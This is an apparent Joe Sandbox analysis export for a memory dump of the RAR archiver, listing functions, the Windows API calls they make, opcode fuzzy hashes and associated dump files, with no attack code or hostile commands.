Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
Instruction ID: f3ecde02631478d68797f5bd82e7ff010efef4119244972a00f4200036951834
Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
Instruction Fuzzy Hash: 56E08668E1910342FF14B7F25804174A3D05F49B50FC54831E93F462D1FE2C644782F5

Function 00007FF7F7EC71FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daa82b36dbe08442567d9e9e6d3a49adf35afbc1da2aff98a3382eab0ee38ee5
Instruction ID: 98c502ae51fc9ed34b4d21b507f085b9c69cbe6d45699a1f531492c8d0f18748
Opcode Fuzzy Hash: daa82b36dbe08442567d9e9e6d3a49adf35afbc1da2aff98a3382eab0ee38ee5
Instruction Fuzzy Hash: D9E1186DA0C68241FB20BA2494456BEA751FF49B88F844137DE6F0B7C6DE2C9467C7B0

Function 00007FF7F7E872C4 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F7EB915C: new.LIBCMT ref: 00007FF7F7EB91CA
Part of subcall function 00007FF7F7EB915C: new.LIBCMT ref: 00007FF7F7EB91F2

new.LIBCMT ref: 00007FF7F7E873DE

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f795e070b02462b6cc60b4888632c25cffd8ce3c4bb1275aca493404e97c2d
Instruction ID: 3cf718a0fe1ca6f21685b95c6f3d0e86dde088cd78bc5fd32b2655f49813dfd0
Opcode Fuzzy Hash: d8f795e070b02462b6cc60b4888632c25cffd8ce3c4bb1275aca493404e97c2d
Instruction Fuzzy Hash: EE512573518BD195E700AF64E8441ED77A8F744F88F98423ADA990B7DADF385062C371

Function 00007FF7F7EE231C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7F7EE2344

Part of subcall function 00007FF7F7EE24D4: GetModuleHandleExW.KERNEL32 ref: 00007FF7F7EE24F4
Part of subcall function 00007FF7F7EE24D4: GetProcAddress.KERNEL32 ref: 00007FF7F7EE250A
Part of subcall function 00007FF7F7EE24D4: FreeLibrary.KERNEL32 ref: 00007FF7F7EE252F

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction ID: 40fb004504cbe5760d76e2d6b985d97bf7ca0dd659a06d32df3a144c0d4b30d8
Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction Fuzzy Hash: 0641C329A09A4382FB68BF159850278A395AF80750FD24837D93F07AD1DE3DE847C7E1

Function 00007FF7F7E94D1C Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32 ref: 00007FF7F7E94D47

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CommandLine
String ID:
API String ID: 3253501508-0
Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
Instruction ID: ba1bfb4a748164379efe68560868a68b8549913b911f9138f0b1d111831f73a3
Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
Instruction Fuzzy Hash: C701611B60D64285EB94B616A4501BE97B0AF86B94F880432EE6E073E9DE3DD547C3A0

Function 00007FF7F7EE4B8C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
Instruction ID: 806cd4ac6953f9612a7956e93398bb09b99968a62993c15ac99c2a5d0f7817ff
Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
Instruction Fuzzy Hash: E5017549A0C54340FB54B6A65A40275D3905F86BE0FC68A32FD7F462D6FD1CE44B41B2

Function 00007FF7F7ECA924 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE ref: 00007FF7F7ECA998

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CompareString
String ID:
API String ID: 1825529933-0
Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
Instruction ID: 21db4c2c8a365ce8e83a18ad438970cf8d713e21eed5bb3512d73175ce95dad0
Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
Instruction Fuzzy Hash: 0801846570C65245EB107B06B80506AE710AB59FC0F9C4836EF9E4BB9ACE3CD0438754

Function 00007FF7F7EA4554 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE ref: 00007FF7F7EA4590

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 86a096c0879f1b9d169584fab09b4cfda0d24ba67280b30728083c95e77eed4d
Instruction ID: db76878c2ed0dd220bcf4f201fe973373636aa94bff80d07975cce12fd34d5e6
Opcode Fuzzy Hash: 86a096c0879f1b9d169584fab09b4cfda0d24ba67280b30728083c95e77eed4d
Instruction Fuzzy Hash: 64F0F9259082C145EF00AB7450012F8A710AF07BB8F584336DE7E0B3C7CE6C908A8770

Function 00007FF7F7EE4AB4 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF7F7EE4AF2

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
Instruction ID: d985e1cc6243cd431f27a0d687dea6e2cfa082eb4cbb18114a2a2e967224f54b
Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
Instruction Fuzzy Hash: 3EF0FE19A4D24341FB647AB2584127593805F4A7B0FCA1E36FD3F462C1EE6CE84B81B6

Function 00007FF7F7EA1930 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 00007FF7F7EA1958

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
Instruction ID: e3efa0597dd7bc71eb083618e1b8003577c311d822105988df14a01d4b503168
Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
Instruction Fuzzy Hash: DDF0AF26A0874245FB24AB68F4403B8A771DB00BB8FD85332D63E050D8DE7CD893C7A0

Function 00007FF7F7EB38A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction ID: 2bcf1e9cb47672712fd152c32f62b443a2313f6ed2376f08ee62f4aadd237a18
Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction Fuzzy Hash: D4E04F58F1930240EF59366E18520798B415F66B81FD4563ECC3F4A3C2EC1EA05F57A1

Function 00007FF7F7EEFA10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE ref: 00007FF7F7EEFA20

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
Instruction ID: d8b45e4d763a80fb9ec3d96639c00110663cf2071ccc25ebfbf372e67b24fe95
Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
Instruction Fuzzy Hash: FCD0176DE1AD0292F704AB40BC4433092A1AF143B9FC10634C83D495D0CFAC3047C2A6

Function 00007FF7F7EA4538 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7EA4549

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
Instruction ID: b9cdf2d64abc763d41a0d1dad0064c232bd72716bbdd0b8f401ad51796970ca2
Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
Instruction Fuzzy Hash: F2C02B29E0148180DB04732D8C450741310BF45739FD00332C13F056E0CF1C40EF0310

Non-executed Functions

Function 00007FF7F7EA67E0 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 441COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F7EC49F4: LoadStringW.USER32 ref: 00007FF7F7EC4A7B
Part of subcall function 00007FF7F7EC49F4: LoadStringW.USER32 ref: 00007FF7F7EC4A94

Part of subcall function 00007FF7F7E98444: fflush.LIBCMT ref: 00007FF7F7E98477

Part of subcall function 00007FF7F7ECB6D0: Sleep.KERNEL32(?,?,?,?,00007FF7F7E9CBED,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7ECB730

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7EA6CB0

Strings

%12ls: %ls, xrefs: 00007FF7F7EA6D01
%21ls %9ls %3d%% %-27ls %u, xrefs: 00007FF7F7EA6DA2
%s%s, xrefs: 00007FF7F7EA6AED
%s: %s, xrefs: 00007FF7F7EA6962
%.10ls %u, xrefs: 00007FF7F7EA6C9D
%s%s, xrefs: 00007FF7F7EA69EB
%21ls %9ls %3d%% %28ls %u, xrefs: 00007FF7F7EA6F85
----------- --------- ---------- ----- ----, xrefs: 00007FF7F7EA6DB0
%s%s, xrefs: 00007FF7F7EA6A17
%12ls: %ls, xrefs: 00007FF7F7EA6CD8
RAR 1.4, xrefs: 00007FF7F7EA69A0
%s%s, xrefs: 00007FF7F7EA6A74
%s: , xrefs: 00007FF7F7EA697B
%21ls %18s %lu, xrefs: 00007FF7F7EA6FA4
----------- --------- -------- ----- ---------- ----- -------- ----, xrefs: 00007FF7F7EA6D6A
RAR 4, xrefs: 00007FF7F7EA6987
%s%s, xrefs: 00007FF7F7EA6AB2
%s%s, xrefs: 00007FF7F7EA6B24
RAR 5, xrefs: 00007FF7F7EA698E
%21ls %-16ls %u, xrefs: 00007FF7F7EA6DCD
%s%s, xrefs: 00007FF7F7EA69C0
EOF, xrefs: 00007FF7F7EA6CD1
V, xrefs: 00007FF7F7EA6D62

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: LoadString$Sleepfflushswprintf
